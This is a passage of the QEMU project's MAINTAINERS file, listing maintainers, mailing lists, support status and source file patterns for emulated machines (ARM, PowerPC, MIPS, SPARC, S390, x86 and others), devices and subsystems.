ZynqMP M: Alistair Francis <alistair@alistair23.me> M: Edgar E. 
Iglesias <edgar.iglesias@gmail.com> M: Peter Maydell <peter.maydell@linaro.org> L: qemu-arm@nongnu.org S: Maintained F: hw/*/xlnx*.c F: include/hw/*/xlnx*.h F: include/hw/ssi/xilinx_spips.h F: hw/display/dpcd.c F: include/hw/display/dpcd.h ARM ACPI Subsystem M: Shannon Zhao <shannon.zhaosl@gmail.com> L: qemu-arm@nongnu.org S: Maintained F: hw/arm/virt-acpi-build.c STM32F205 M: Alistair Francis <alistair@alistair23.me> M: Peter Maydell <peter.maydell@linaro.org> L: qemu-arm@nongnu.org S: Maintained F: hw/arm/stm32f205_soc.c F: hw/misc/stm32f2xx_syscfg.c F: hw/char/stm32f2xx_usart.c F: hw/timer/stm32f2xx_timer.c F: hw/adc/* F: hw/ssi/stm32f2xx_spi.c F: include/hw/*/stm32*.h STM32F405 M: Alistair Francis <alistair@alistair23.me> M: Peter Maydell <peter.maydell@linaro.org> L: qemu-arm@nongnu.org S: Maintained F: hw/arm/stm32f405_soc.c F: hw/misc/stm32f4xx_syscfg.c F: hw/misc/stm32f4xx_exti.c Netduino 2 M: Alistair Francis <alistair@alistair23.me> M: Peter Maydell <peter.maydell@linaro.org> L: qemu-arm@nongnu.org S: Maintained F: hw/arm/netduino2.c Netduino Plus 2 M: Alistair Francis <alistair@alistair23.me> M: Peter Maydell <peter.maydell@linaro.org> L: qemu-arm@nongnu.org S: Maintained F: hw/arm/netduinoplus2.c SmartFusion2 M: Subbaraya Sundeep <sundeep.lkml@gmail.com> M: Peter Maydell <peter.maydell@linaro.org> L: qemu-arm@nongnu.org S: Maintained F: hw/arm/msf2-soc.c F: hw/misc/msf2-sysreg.c F: hw/timer/mss-timer.c F: hw/ssi/mss-spi.c F: include/hw/arm/msf2-soc.h F: include/hw/misc/msf2-sysreg.h F: include/hw/timer/mss-timer.h F: include/hw/ssi/mss-spi.h Emcraft M2S-FG484 M: Subbaraya Sundeep <sundeep.lkml@gmail.com> M: Peter Maydell <peter.maydell@linaro.org> L: qemu-arm@nongnu.org S: Maintained F: hw/arm/msf2-som.c ASPEED BMCs M: Cédric Le Goater <clg@kaod.org> M: Peter Maydell <peter.maydell@linaro.org> R: Andrew Jeffery <andrew@aj.id.au> R: Joel Stanley <joel@jms.id.au> L: qemu-arm@nongnu.org S: Maintained F: hw/*/*aspeed* F: hw/misc/pca9552.c F: include/hw/*/*aspeed* F: include/hw/misc/pca9552*.h F: hw/net/ftgmac100.c F: include/hw/net/ftgmac100.h NRF51 M: Joel Stanley <joel@jms.id.au> M: Peter Maydell <peter.maydell@linaro.org> L: qemu-arm@nongnu.org S: Maintained F: hw/*/nrf51*.c F: hw/*/microbit*.c F: include/hw/*/nrf51*.h F: include/hw/*/microbit*.h F: tests/qtest/microbit-test.c CRIS Machines ------------- Axis Dev88 M: Edgar E. 
Iglesias <edgar.iglesias@gmail.com> S: Maintained F: hw/cris/axis_dev88.c F: hw/*/etraxfs_*.c HP-PARISC Machines ------------------ HP B160L M: Richard Henderson <rth@twiddle.net> R: Helge Deller <deller@gmx.de> S: Odd Fixes F: default-configs/hppa-softmmu.mak F: hw/hppa/ F: pc-bios/hppa-firmware.img LM32 Machines ------------- EVR32 and uclinux BSP M: Michael Walle <michael@walle.cc> S: Maintained F: hw/lm32/lm32_boards.c milkymist M: Michael Walle <michael@walle.cc> S: Maintained F: hw/lm32/milkymist.c M68K Machines ------------- an5206 M: Thomas Huth <huth@tuxfamily.org> S: Odd Fixes F: hw/m68k/an5206.c F: hw/m68k/mcf5206.c mcf5208 M: Thomas Huth <huth@tuxfamily.org> S: Odd Fixes F: hw/m68k/mcf5208.c F: hw/m68k/mcf_intc.c F: hw/char/mcf_uart.c F: hw/net/mcf_fec.c F: include/hw/m68k/mcf*.h NeXTcube M: Thomas Huth <huth@tuxfamily.org> S: Odd Fixes F: hw/m68k/next-*.c F: hw/display/next-fb.c F: include/hw/m68k/next-cube.h q800 M: Laurent Vivier <laurent@vivier.eu> S: Maintained F: hw/m68k/q800.c F: hw/misc/mac_via.c F: hw/nubus/* F: hw/display/macfb.c F: hw/block/swim.c F: hw/m68k/bootinfo.h F: include/hw/misc/mac_via.h F: include/hw/nubus/* F: include/hw/display/macfb.h F: include/hw/block/swim.h MicroBlaze Machines ------------------- petalogix_s3adsp1800 M: Edgar E. Iglesias <edgar.iglesias@gmail.com> S: Maintained F: hw/microblaze/petalogix_s3adsp1800_mmu.c F: include/hw/char/xilinx_uartlite.h petalogix_ml605 M: Edgar E. Iglesias <edgar.iglesias@gmail.com> S: Maintained F: hw/microblaze/petalogix_ml605_mmu.c MIPS Machines ------------- Jazz M: Hervé Poussineau <hpoussin@reactos.org> R: Aleksandar Rikalo <aleksandar.rikalo@rt-rk.com> S: Maintained F: hw/mips/mips_jazz.c F: hw/display/jazz_led.c F: hw/dma/rc4030.c Malta M: Aleksandar Markovic <aleksandar.qemu.devel@gmail.com> M: Philippe Mathieu-Daudé <f4bug@amsat.org> R: Aurelien Jarno <aurelien@aurel32.net> S: Maintained F: hw/isa/piix4.c F: hw/acpi/piix4.c F: hw/mips/mips_malta.c F: hw/mips/gt64xxx_pci.c F: include/hw/southbridge/piix.h F: tests/acceptance/linux_ssh_mips_malta.py F: tests/acceptance/machine_mips_malta.py Mipssim M: Aleksandar Markovic <aleksandar.qemu.devel@gmail.com> R: Aleksandar Rikalo <aleksandar.rikalo@rt-rk.com> S: Odd Fixes F: hw/mips/mips_mipssim.c F: hw/net/mipsnet.c R4000 M: Aleksandar Markovic <aleksandar.qemu.devel@gmail.com> R: Aurelien Jarno <aurelien@aurel32.net> R: Aleksandar Rikalo <aleksandar.rikalo@rt-rk.com> S: Obsolete F: hw/mips/mips_r4k.c Fulong 2E M: Philippe Mathieu-Daudé <f4bug@amsat.org> M: Aleksandar Markovic <aleksandar.qemu.devel@gmail.com> S: Odd Fixes F: hw/mips/mips_fulong2e.c F: hw/isa/vt82c686.c F: hw/pci-host/bonito.c F: include/hw/isa/vt82c686.h Boston M: Paul Burton <pburton@wavecomp.com> R: Aleksandar Rikalo <aleksandar.rikalo@rt-rk.com> S: Maintained F: hw/core/loader-fit.c F: hw/mips/boston.c F: hw/pci-host/xilinx-pcie.c F: include/hw/pci-host/xilinx-pcie.h OpenRISC Machines ----------------- or1k-sim M: Jia Liu <proljc@gmail.com> S: Maintained F: hw/openrisc/openrisc_sim.c PowerPC Machines ---------------- 405 M: David Gibson <david@gibson.dropbear.id.au> L: qemu-ppc@nongnu.org S: Odd Fixes F: hw/ppc/ppc405_boards.c Bamboo M: David Gibson <david@gibson.dropbear.id.au> L: qemu-ppc@nongnu.org S: Odd Fixes F: hw/ppc/ppc440_bamboo.c e500 M: David Gibson <david@gibson.dropbear.id.au> L: qemu-ppc@nongnu.org S: Odd Fixes F: hw/ppc/e500* F: hw/gpio/mpc8xxx.c F: hw/i2c/mpc_i2c.c F: hw/net/fsl_etsec/ F: hw/pci-host/ppce500.c F: include/hw/ppc/ppc_e500.h F: include/hw/pci-host/ppce500.h 
F: pc-bios/u-boot.e500

mpc8544ds
M: David Gibson <david@gibson.dropbear.id.au>
L: qemu-ppc@nongnu.org
S: Odd Fixes
F: hw/ppc/mpc8544ds.c
F: hw/ppc/mpc8544_guts.c

New World (mac99)
M: Mark Cave-Ayland <mark.cave-ayland@ilande.co.uk>
R: David Gibson <david@gibson.dropbear.id.au>
L: qemu-ppc@nongnu.org
S: Odd Fixes
F: hw/ppc/mac_newworld.c
F: hw/pci-host/uninorth.c
F: hw/pci-bridge/dec.[hc]
F: hw/misc/macio/
F: hw/misc/mos6522.c
F: hw/nvram/mac_nvram.c
F: hw/input/adb*
F: include/hw/misc/macio/
F: include/hw/misc/mos6522.h
F: include/hw/ppc/mac_dbdma.h
F: include/hw/pci-host/uninorth.h
F: include/hw/input/adb*
F: pc-bios/qemu_vga.ndrv

Old World (g3beige)
M: Mark Cave-Ayland <mark.cave-ayland@ilande.co.uk>
R: David Gibson <david@gibson.dropbear.id.au>
L: qemu-ppc@nongnu.org
S: Odd Fixes
F: hw/ppc/mac_oldworld.c
F: hw/pci-host/grackle.c
F: hw/misc/macio/
F: hw/intc/heathrow_pic.c
F: hw/input/adb*
F: include/hw/intc/heathrow_pic.h
F: include/hw/input/adb*
F: pc-bios/qemu_vga.ndrv

PReP
M: Hervé Poussineau <hpoussin@reactos.org>
L: qemu-ppc@nongnu.org
S: Maintained
F: hw/ppc/prep.c
F: hw/ppc/prep_systemio.c
F: hw/ppc/rs6000_mc.c
F: hw/pci-host/prep.[hc]
F: hw/isa/i82378.c
F: hw/isa/pc87312.c
F: hw/dma/i82374.c
F: hw/rtc/m48t59-isa.c
F: include/hw/isa/pc87312.h
F: include/hw/rtc/m48t59.h
F: tests/acceptance/ppc_prep_40p.py

sPAPR
M: David Gibson <david@gibson.dropbear.id.au>
L: qemu-ppc@nongnu.org
S: Supported
F: hw/*/spapr*
F: include/hw/*/spapr*
F: hw/*/xics*
F: include/hw/*/xics*
F: pc-bios/slof.bin
F: docs/specs/ppc-spapr-hcalls.txt
F: docs/specs/ppc-spapr-hotplug.txt
F: tests/qtest/spapr*
F: tests/qtest/libqos/*spapr*
F: tests/qtest/rtas*
F: tests/qtest/libqos/rtas*

PowerNV (Non-Virtualized)
M: Cédric Le Goater <clg@kaod.org>
M: David Gibson <david@gibson.dropbear.id.au>
L: qemu-ppc@nongnu.org
S: Maintained
F: hw/ppc/pnv*
F: hw/intc/pnv*
F: hw/intc/xics_pnv.c
F: include/hw/ppc/pnv*
F: pc-bios/skiboot.lid
F: tests/qtest/pnv*

virtex_ml507
M: Edgar E. Iglesias <edgar.iglesias@gmail.com>
L: qemu-ppc@nongnu.org
S: Odd Fixes
F: hw/ppc/virtex_ml507.c

sam460ex
M: BALATON Zoltan <balaton@eik.bme.hu>
L: qemu-ppc@nongnu.org
S: Maintained
F: hw/ppc/sam460ex.c
F: hw/ppc/ppc440_pcix.c
F: hw/display/sm501*
F: hw/ide/sii3112.c
F: hw/rtc/m41t80.c
F: pc-bios/canyonlands.dt[sb]
F: pc-bios/u-boot-sam460ex-20100605.bin
F: roms/u-boot-sam460ex

SH4 Machines
------------

R2D
M: Magnus Damm <magnus.damm@gmail.com>
S: Maintained
F: hw/sh4/r2d.c
F: hw/intc/sh_intc.c
F: hw/timer/sh_timer.c

Shix
M: Magnus Damm <magnus.damm@gmail.com>
S: Odd Fixes
F: hw/sh4/shix.c

SPARC Machines
--------------

Sun4m
M: Mark Cave-Ayland <mark.cave-ayland@ilande.co.uk>
S: Maintained
F: hw/sparc/sun4m.c
F: hw/sparc/sun4m_iommu.c
F: hw/display/cg3.c
F: hw/display/tcx.c
F: hw/dma/sparc32_dma.c
F: hw/misc/eccmemctl.c
F: hw/*/slavio_*.c
F: include/hw/nvram/sun_nvram.h
F: include/hw/sparc/sparc32_dma.h
F: include/hw/sparc/sun4m_iommu.h
F: pc-bios/openbios-sparc32

Sun4u
M: Mark Cave-Ayland <mark.cave-ayland@ilande.co.uk>
S: Maintained
F: hw/sparc64/sun4u.c
F: hw/sparc64/sun4u_iommu.c
F: include/hw/sparc/sun4u_iommu.h
F: hw/pci-host/sabre.c
F: include/hw/pci-host/sabre.h
F: hw/pci-bridge/simba.c
F: include/hw/pci-bridge/simba.h
F: pc-bios/openbios-sparc64

Sun4v
M: Artyom Tarasenko <atar4qemu@gmail.com>
S: Maintained
F: hw/sparc64/niagara.c
F: hw/rtc/sun4v-rtc.c
F: include/hw/rtc/sun4v-rtc.h

Leon3
M: Fabien Chouteau <chouteau@adacore.com>
M: KONRAD Frederic <frederic.konrad@adacore.com>
S: Maintained
F: hw/sparc/leon3.c
F: hw/*/grlib*
F: include/hw/*/grlib*
F: tests/acceptance/machine_sparc_leon3.py

S390 Machines
-------------

S390 Virtio-ccw
M: Cornelia Huck <cohuck@redhat.com>
M: Halil Pasic <pasic@linux.ibm.com>
M: Christian Borntraeger <borntraeger@de.ibm.com>
S: Supported
F: hw/char/sclp*.[hc]
F: hw/char/terminal3270.c
F: hw/s390x/
F: include/hw/s390x/
F: hw/watchdog/wdt_diag288.c
F: include/hw/watchdog/wdt_diag288.h
F: default-configs/s390x-softmmu.mak
T: git https://github.com/cohuck/qemu.git s390-next
T: git https://github.com/borntraeger/qemu.git s390-next
L: qemu-s390x@nongnu.org

S390-ccw boot
M: Christian Borntraeger <borntraeger@de.ibm.com>
M: Thomas Huth <thuth@redhat.com>
S: Supported
F: hw/s390x/ipl.*
F: pc-bios/s390-ccw/
F: pc-bios/s390-ccw.img
F: docs/devel/s390-dasd-ipl.rst
T: git https://github.com/borntraeger/qemu.git s390-next
L: qemu-s390x@nongnu.org

S390 PCI
M: Matthew Rosato <mjrosato@linux.ibm.com>
S: Supported
F: hw/s390x/s390-pci*
L: qemu-s390x@nongnu.org

UniCore32 Machines
------------------

PKUnity-3 SoC initramfs-with-busybox
M: Guan Xuetao <gxt@mprc.pku.edu.cn>
S: Maintained
F: hw/*/puv3*
F: hw/unicore32/

X86 Machines
------------

PC
M: Michael S. Tsirkin <mst@redhat.com>
M: Marcel Apfelbaum <marcel.apfelbaum@gmail.com>
S: Supported
F: include/hw/i386/
F: hw/i386/
F: hw/pci-host/i440fx.c
F: hw/pci-host/q35.c
F: hw/pci-host/pam.c
F: include/hw/pci-host/i440fx.h
F: include/hw/pci-host/q35.h
F: include/hw/pci-host/pam.h
F: hw/isa/piix3.c
F: hw/isa/lpc_ich9.c
F: hw/i2c/smbus_ich9.c
F: hw/acpi/piix4.c
F: hw/acpi/ich9.c
F: include/hw/acpi/ich9.h
F: include/hw/southbridge/piix.h
F: hw/misc/sga.c
F: hw/isa/apm.c
F: include/hw/isa/apm.h
F: tests/test-x86-cpuid.c
F: tests/qtest/test-x86-cpuid-compat.c

PC Chipset
M: Michael S. Tsirkin <mst@redhat.com>
M: Paolo Bonzini <pbonzini@redhat.com>
S: Supported
F: hw/char/debugcon.c
F: hw/char/parallel*
F: hw/char/serial*
F: hw/dma/i8257*
F: hw/i2c/pm_smbus.c
F: hw/input/pckbd.c
F: hw/intc/apic*
F: hw/intc/ioapic*
F: hw/intc/i8259*
F: hw/isa/isa-superio.c
F: hw/misc/debugexit.c
F: hw/misc/pc-testdev.c
F: hw/timer/hpet*
F: hw/timer/i8254*
F: hw/rtc/mc146818rtc*
F: hw/watchdog/wdt_ib700.c
F: hw/watchdog/wdt_i6300esb.c
F: include/hw/display/vga.h
F: include/hw/char/parallel.h
F: include/hw/dma/i8257.h
F: include/hw/i2c/pm_smbus.h
F: include/hw/input/i8042.h
F: include/hw/isa/i8259_internal.h
F: include/hw/isa/superio.h
F: include/hw/timer/hpet.h
F: include/hw/timer/i8254*
F: include/hw/rtc/mc146818rtc*

microvm
M: Sergio Lopez <slp@redhat.com>
M: Paolo Bonzini <pbonzini@redhat.com>
S: Maintained
F: docs/microvm.rst
F: hw/i386/microvm.c
F: include/hw/i386/microvm.h
F: pc-bios/bios-microvm.bin

Machine core
M: Eduardo Habkost <ehabkost@redhat.com>
M: Marcel Apfelbaum <marcel.apfelbaum@gmail.com>
S: Supported
F: hw/core/cpu.c
F: hw/core/machine-qmp-cmds.c
F: hw/core/machine.c
F: hw/core/null-machine.c
F: hw/core/numa.c
F: hw/cpu/cluster.c
F: qapi/machine.json
F: qapi/machine-target.json
F: include/hw/boards.h
F: include/hw/core/cpu.h
F: include/hw/cpu/cluster.h
F: include/sysemu/numa.h
T: git https://github.com/ehabkost/qemu.git machine-next

Xtensa Machines
---------------

sim
M: Max Filippov <jcmvbkbc@gmail.com>
S: Maintained
F: hw/xtensa/sim.c

virt
M: Max Filippov <jcmvbkbc@gmail.com>
S: Maintained
F: hw/xtensa/virt.c

XTFPGA (LX60, LX200, ML605, KC705)
M: Max Filippov <jcmvbkbc@gmail.com>
S: Maintained
F: hw/xtensa/xtfpga.c
F: hw/net/opencores_eth.c

Devices
-------

EDU
M: Jiri Slaby <jslaby@suse.cz>
S: Maintained
F: hw/misc/edu.c

IDE
M: John Snow <jsnow@redhat.com>
L: qemu-block@nongnu.org
S: Supported
F: include/hw/ide.h
F: include/hw/ide/
F: hw/ide/
F: hw/block/block.c
F: hw/block/cdrom.c
F: hw/block/hd-geometry.c
F: tests/qtest/ide-test.c
F: tests/qtest/ahci-test.c
F: tests/qtest/cdrom-test.c
F: tests/qtest/libqos/ahci*
T: git https://github.com/jnsnow/qemu.git ide

IPMI
M: Corey Minyard <minyard@acm.org>
S: Maintained
F: include/hw/ipmi/*
F: hw/ipmi/*
F: hw/smbios/smbios_type_38.c
F: tests/qtest/ipmi*
T: git https://github.com/cminyard/qemu.git master-ipmi-rebase

Floppy
M: John Snow <jsnow@redhat.com>
L: qemu-block@nongnu.org
S: Supported
F: hw/block/fdc.c
F: include/hw/block/fdc.h
F: tests/qtest/fdc-test.c
T: git https://github.com/jnsnow/qemu.git ide

OMAP
M: Peter Maydell <peter.maydell@linaro.org>
L: qemu-arm@nongnu.org
S: Maintained
F: hw/*/omap*
F: include/hw/arm/omap.h

IPack
M: Alberto Garcia <berto@igalia.com>
S: Odd Fixes
F: hw/char/ipoctal232.c
F: hw/ipack/

PCI
M: Michael S. Tsirkin <mst@redhat.com>
M: Marcel Apfelbaum <marcel.apfelbaum@gmail.com>
S: Supported
F: include/hw/pci/*
F: hw/misc/pci-testdev.c
F: hw/pci/*
F: hw/pci-bridge/*
F: docs/pci*
F: docs/specs/*pci*
F: default-configs/pci.mak

ACPI/SMBIOS
M: Michael S. Tsirkin <mst@redhat.com>
M: Igor Mammedov <imammedo@redhat.com>
S: Supported
F: include/hw/acpi/*
F: include/hw/firmware/smbios.h
F: hw/mem/*
F: hw/acpi/*
F: hw/smbios/*
F: hw/i386/acpi-build.[hc]
F: hw/arm/virt-acpi-build.c
F: tests/qtest/bios-tables-test.c
F: tests/qtest/acpi-utils.[hc]
F: tests/data/acpi/

ppc4xx
M: David Gibson <david@gibson.dropbear.id.au>
L: qemu-ppc@nongnu.org
S: Odd Fixes
F: hw/ppc/ppc4*.c
F: hw/i2c/ppc4xx_i2c.c
F: include/hw/ppc/ppc4xx.h
F: include/hw/i2c/ppc4xx_i2c.h

Character devices
M: Marc-André Lureau <marcandre.lureau@redhat.com>
R: Paolo Bonzini <pbonzini@redhat.com>
S: Odd Fixes
F: hw/char/

Network devices
M: Jason Wang <jasowang@redhat.com>
S: Odd Fixes
F: hw/net/
F: include/hw/net/
F: tests/qtest/virtio-net-test.c
F: docs/virtio-net-failover.rst
T: git https://github.com/jasowang/qemu.git net

Parallel NOR Flash devices
M: Philippe Mathieu-Daudé <philmd@redhat.com>
T: git https://gitlab.com/philmd/qemu.git pflash-next
S: Maintained
F: hw/block/pflash_cfi*.c
F: include/hw/block/flash.h

SCSI
M: Paolo Bonzini <pbonzini@redhat.com>
R: Fam Zheng <fam@euphon.net>
S: Supported
F: include/hw/scsi/*
F: hw/scsi/*
F: tests/qtest/virtio-scsi-test.c
T: git https://github.com/bonzini/qemu.git scsi-next

SSI
M: Alistair Francis <alistair@alistair23.me>
S: Maintained
F: hw/ssi/*
F: hw/block/m25p80.c
F: include/hw/ssi/ssi.h
X: hw/ssi/xilinx_*
F: tests/qtest/m25p80-test.c

Xilinx SPI
M: Alistair Francis <alistair@alistair23.me>
S: Maintained
F: hw/ssi/xilinx_*

SD (Secure Card)
M: Philippe Mathieu-Daudé <f4bug@amsat.org>
S: Odd Fixes
F: include/hw/sd/sd*
F: hw/sd/core.c
F: hw/sd/sd*
F: hw/sd/ssi-sd.c
F: tests/qtest/sd*

USB
M: Gerd Hoffmann <kraxel@redhat.com>
S: Maintained
F: hw/usb/*
F: tests/qtest/usb-*-test.c
F: docs/usb2.txt
F: docs/usb-storage.txt
F: include/hw/usb.h
F: include/hw/usb/
F: default-configs/usb.mak

USB (serial adapter)
M: Gerd Hoffmann <kraxel@redhat.com>
M: Samuel Thibault <samuel.thibault@ens-lyon.org>
S: Maintained
F: hw/usb/dev-serial.c

VFIO
M: Alex Williamson <alex.williamson@redhat.com>
S: Supported
F: hw/vfio/*
F: include/hw/vfio/

vfio-ccw
M: Cornelia Huck <cohuck@redhat.com>
M: Eric Farman <farman@linux.ibm.com>
S: Supported
F: hw/vfio/ccw.c
F: hw/s390x/s390-ccw.c
F: include/hw/s390x/s390-ccw.h
F: include/hw/s390x/vfio-ccw.h
T: git https://github.com/cohuck/qemu.git s390-next
L: qemu-s390x@nongnu.org

vfio-ap
M: Christian Borntraeger <borntraeger@de.ibm.com>
M: Tony Krowiak <akrowiak@linux.ibm.com>
M: Halil Pasic <pasic@linux.ibm.com>
M: Pierre Morel <pmorel@linux.ibm.com>
S: Supported
F: hw/s390x/ap-device.c
F: hw/s390x/ap-bridge.c
F: include/hw/s390x/ap-device.h
F: include/hw/s390x/ap-bridge.h
F: hw/vfio/ap.c
F: docs/system/s390x/vfio-ap.rst
L: qemu-s390x@nongnu.org

vhost
M: Michael S. Tsirkin <mst@redhat.com>
S: Supported
F: hw/*/*vhost*
F: docs/interop/vhost-user.json
F: docs/interop/vhost-user.rst
F: contrib/vhost-user-*/
F: backends/vhost-user.c
F: include/sysemu/vhost-user-backend.h

virtio
M: Michael S. Tsirkin <mst@redhat.com>
S: Supported
F: hw/*/virtio*
F: hw/virtio/Makefile.objs
F: hw/virtio/trace-events
F: net/vhost-user.c
F: include/hw/virtio/

virtio-balloon
M: Michael S. Tsirkin <mst@redhat.com>
M: David Hildenbrand <david@redhat.com>
S: Maintained
F: hw/virtio/virtio-balloon*.c
F: include/hw/virtio/virtio-balloon.h
F: balloon.c
F: include/sysemu/balloon.h

virtio-9p
M: Greg Kurz <groug@kaod.org>
R: Christian Schoenebeck <qemu_oss@crudebyte.com>
S: Odd Fixes
F: hw/9pfs/
X: hw/9pfs/xen-9p*
F: fsdev/
F: docs/interop/virtfs-proxy-helper.rst
F: tests/qtest/virtio-9p-test.c
T: git https://github.com/gkurz/qemu.git 9p-next

virtio-blk
M: Stefan Hajnoczi <stefanha@redhat.com>
L: qemu-block@nongnu.org
S: Supported
F: hw/block/virtio-blk.c
F: hw/block/dataplane/*
F: tests/qtest/virtio-blk-test.c
T: git https://github.com/stefanha/qemu.git block

virtio-ccw
M: Cornelia Huck <cohuck@redhat.com>
M: Halil Pasic <pasic@linux.ibm.com>
S: Supported
F: hw/s390x/virtio-ccw*.[hc]
F: hw/s390x/vhost-vsock-ccw.c
T: git https://github.com/cohuck/qemu.git s390-next
T: git https://github.com/borntraeger/qemu.git s390-next
L: qemu-s390x@nongnu.org

virtiofs
M: Dr. David Alan Gilbert <dgilbert@redhat.com>
M: Stefan Hajnoczi <stefanha@redhat.com>
S: Supported
F: tools/virtiofsd/*
F: hw/virtio/vhost-user-fs*
F: include/hw/virtio/vhost-user-fs.h
F: docs/interop/virtiofsd.rst

virtio-input
M: Gerd Hoffmann <kraxel@redhat.com>
S: Maintained
F: hw/input/vhost-user-input.c
F: hw/input/virtio-input*.c
F: include/hw/virtio/virtio-input.h
F: contrib/vhost-user-input/*

virtio-iommu
M: Eric Auger <eric.auger@redhat.com>
S: Maintained
F: hw/virtio/virtio-iommu*.c
F: include/hw/virtio/virtio-iommu.h

virtio-serial
M: Laurent Vivier <lvivier@redhat.com>
R: Amit Shah <amit@kernel.org>
S: Supported
F: hw/char/virtio-serial-bus.c
F: hw/char/virtio-console.c
F: include/hw/virtio/virtio-serial.h
F: tests/qtest/virtio-serial-test.c

virtio-rng
M: Laurent Vivier <lvivier@redhat.com>
R: Amit Shah <amit@kernel.org>
S: Supported
F: hw/virtio/virtio-rng.c
F: include/hw/virtio/virtio-rng.h
F: include/sysemu/rng*.h
F: backends/rng*.c
F: tests/qtest/virtio-rng-test.c

virtio-crypto
M: Gonglei <arei.gonglei@huawei.com>
S: Supported
F: hw/virtio/virtio-crypto.c
F: hw/virtio/virtio-crypto-pci.c
F: include/hw/virtio/virtio-crypto.h

nvme
M: Keith Busch <keith.busch@intel.com>
L: qemu-block@nongnu.org
S: Supported
F: hw/block/nvme*
F: tests/qtest/nvme-test.c

megasas
M: Hannes Reinecke <hare@suse.com>
L: qemu-block@nongnu.org
S: Supported
F: hw/scsi/megasas.c
F: hw/scsi/mfi.h
F: tests/qtest/megasas-test.c

Network packet abstractions
M: Dmitry Fleytman <dmitry.fleytman@gmail.com>
S: Maintained
F: include/net/eth.h
F: net/eth.c
F: hw/net/net_rx_pkt*
F: hw/net/net_tx_pkt*

Vmware
M: Dmitry Fleytman <dmitry.fleytman@gmail.com>
S: Maintained
F: hw/net/vmxnet*
F: hw/scsi/vmw_pvscsi*
F: tests/qtest/vmxnet3-test.c

Rocker
M: Jiri Pirko <jiri@resnulli.us>
S: Maintained
F: hw/net/rocker/
F: tests/rocker/
F: docs/specs/rocker.txt

NVDIMM
M: Xiao Guangrong <xiaoguangrong.eric@gmail.com>
S: Maintained
F: hw/acpi/nvdimm.c
F: hw/mem/nvdimm.c
F: include/hw/mem/nvdimm.h
F: docs/nvdimm.txt

e1000x
M: Dmitry Fleytman <dmitry.fleytman@gmail.com>
S: Maintained
F: hw/net/e1000x*

e1000e
M: Dmitry Fleytman <dmitry.fleytman@gmail.com>
S: Maintained
F: hw/net/e1000e*

eepro100
M: Stefan Weil <sw@weilnetz.de>
S: Maintained
F: hw/net/eepro100.c

tulip
M: Sven Schnelle <svens@stackframe.org>
S: Maintained
F: hw/net/tulip.c
F: hw/net/tulip.h

Generic Loader
M: Alistair Francis <alistair@alistair23.me>
S: Maintained
F: hw/core/generic-loader.c
F: include/hw/core/generic-loader.h
F: docs/generic-loader.txt

Intel Hexadecimal Object File Loader
M: Su Hang <suhang16@mails.ucas.ac.cn>
S: Maintained
F: tests/qtest/hexloader-test.c
F: tests/data/hex-loader/test.hex

CHRP NVRAM
M: Thomas Huth <thuth@redhat.com>
S: Maintained
F: hw/nvram/chrp_nvram.c
F: include/hw/nvram/chrp_nvram.h
F: tests/qtest/prom-env-test.c

VM Generation ID
M: Ben Warren <ben@skyportsystems.com>
S: Maintained
F: hw/acpi/vmgenid.c
F: include/hw/acpi/vmgenid.h
F: docs/specs/vmgenid.txt
F: tests/qtest/vmgenid-test.c
F: stubs/vmgenid.c

Unimplemented device
M: Peter Maydell <peter.maydell@linaro.org>
R: Philippe Mathieu-Daudé <f4bug@amsat.org>
S: Maintained
F: include/hw/misc/unimp.h
F: hw/misc/unimp.c

Standard VGA
M: Gerd Hoffmann <kraxel@redhat.com>
S: Maintained
F: hw/display/vga*
F: hw/display/bochs-display.c
F: include/hw/display/vga.h
F: include/hw/display/bochs-vbe.h

ramfb
M: Gerd Hoffmann <kraxel@redhat.com>
S: Maintained
F: hw/display/ramfb*.c
F: include/hw/display/ramfb.h

virtio-gpu
M: Gerd Hoffmann <kraxel@redhat.com>
S: Maintained
F: hw/display/virtio-gpu*
F: hw/display/virtio-vga.*
F: include/hw/virtio/virtio-gpu.h

vhost-user-blk
M: Raphael Norwitz <raphael.norwitz@nutanix.com>
S: Maintained
F: contrib/vhost-user-blk/
F: contrib/vhost-user-scsi/
F: hw/block/vhost-user-blk.c
F: hw/scsi/vhost-user-scsi.c
F: hw/virtio/vhost-user-blk-pci.c
F: hw/virtio/vhost-user-scsi-pci.c
F: include/hw/virtio/vhost-user-blk.h
F: include/hw/virtio/vhost-user-scsi.h

vhost-user-gpu
M: Marc-André Lureau <marcandre.lureau@redhat.com>
M: Gerd Hoffmann <kraxel@redhat.com>
S: Maintained
F: docs/interop/vhost-user-gpu.rst
F: contrib/vhost-user-gpu
F: hw/display/vhost-user-*

Cirrus VGA
M: Gerd Hoffmann <kraxel@redhat.com>
S: Odd Fixes
W: https://www.kraxel.org/blog/2014/10/qemu-using-cirrus-considered-harmful/
F: hw/display/cirrus*

EDID Generator
M: Gerd Hoffmann <kraxel@redhat.com>
S: Maintained
F: hw/display/edid*
F: include/hw/display/edid.h
F: qemu-edid.c

PIIX4 South Bridge (i82371AB)
M: Hervé Poussineau <hpoussin@reactos.org>
M: Philippe Mathieu-Daudé <f4bug@amsat.org>
S: Maintained
F: hw/isa/piix4.c
F: include/hw/southbridge/piix.h

Firmware configuration (fw_cfg)
M: Philippe Mathieu-Daudé <philmd@redhat.com>
R: Laszlo Ersek <lersek@redhat.com>
R: Gerd Hoffmann <kraxel@redhat.com>
S: Supported
F: docs/specs/fw_cfg.txt
F: hw/nvram/fw_cfg.c
F: stubs/fw_cfg.c
F: include/hw/nvram/fw_cfg.h
F: include/standard-headers/linux/qemu_fw_cfg.h
F: tests/qtest/libqos/fw_cfg.c
F: tests/qtest/fw_cfg-test.c
T: git https://github.com/philmd/qemu.git fw_cfg-next

XIVE
M: David Gibson <david@gibson.dropbear.id.au>
M: Cédric Le Goater <clg@kaod.org>
L: qemu-ppc@nongnu.org
S: Supported
F: hw/*/*xive*
F: include/hw/*/*xive*
F: docs/*/*xive*

Subsystems
----------

Audio
M: Gerd Hoffmann <kraxel@redhat.com>
S: Maintained
F: audio/
F: hw/audio/
F: include/hw/audio/
F: tests/qtest/ac97-test.c
F: tests/qtest/es1370-test.c
F: tests/qtest/intel-hda-test.c

Block layer core
M: Kevin Wolf <kwolf@redhat.com>
M: Max Reitz <mreitz@redhat.com>
L: qemu-block@nongnu.org
S: Supported
F: block*
F: block/
F: hw/block/
F: include/block/
F: qemu-img*
F: docs/interop/qemu-img.rst
F: qemu-io*
F: tests/qemu-iotests/
F: util/qemu-progress.c
F: qobject/block-qdict.c
F: tests/check-block-qdict.c
T: git https://repo.or.cz/qemu/kevin.git block

Block I/O path
M: Stefan Hajnoczi <stefanha@redhat.com>
M: Fam Zheng <fam@euphon.net>
L: qemu-block@nongnu.org
